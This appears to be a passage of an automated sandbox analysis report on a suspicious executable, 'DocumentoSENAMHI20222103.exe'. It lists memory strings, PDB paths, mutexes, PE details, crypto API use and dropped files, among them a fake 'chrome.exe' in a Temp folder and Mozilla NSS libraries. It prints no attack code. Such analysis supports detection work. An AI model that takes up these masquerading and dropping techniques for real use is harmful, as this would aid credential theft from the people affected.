Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81012939877.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010861865.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81007454020.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81014511114.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010600849.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81013135435.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81012939877.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010861865.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81007454020.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81014511114.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010600849.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81013135435.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Mutant created: \Sessions\1\BaseNamedObjects\776E9B90846C
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1033676:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1034132:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1034132:120:WilError_03
Source: Chrome[1].exe.1.dr, ????????????/?????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: Chrome[1].exe.1.dr, ????????????/?????.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: wtqsCpda..exe.1.dr, ????????????/?????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: wtqsCpda..exe.1.dr, ????????????/?????.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: chrome.exe.15.dr, ????????????/?????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: chrome.exe.15.dr, ????????????/?????.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ????????????/?????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.0.wtqsCpda..exe.540000.3.unpack, ????????????/?????.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: C:\Users\user\AppData\Local\Temp\chrome.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: DocumentoSENAMHI20222103.exe Static file information: File size 1320960 > 1048576
Source: DocumentoSENAMHI20222103.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x129400
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: DocumentoSENAMHI20222103.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: DocumentoSENAMHI20222103.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: vcruntime140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: msvcp140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: DocumentoSENAMHI20222103.exe
Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: USB.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdbd source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
Source: Binary string: PIN.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: msvcp140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81029831720.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81028272449.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81023544899.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81027987212.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81029572816.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81030566751.0000000005E59000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuser32.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: PIN.pdbX source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
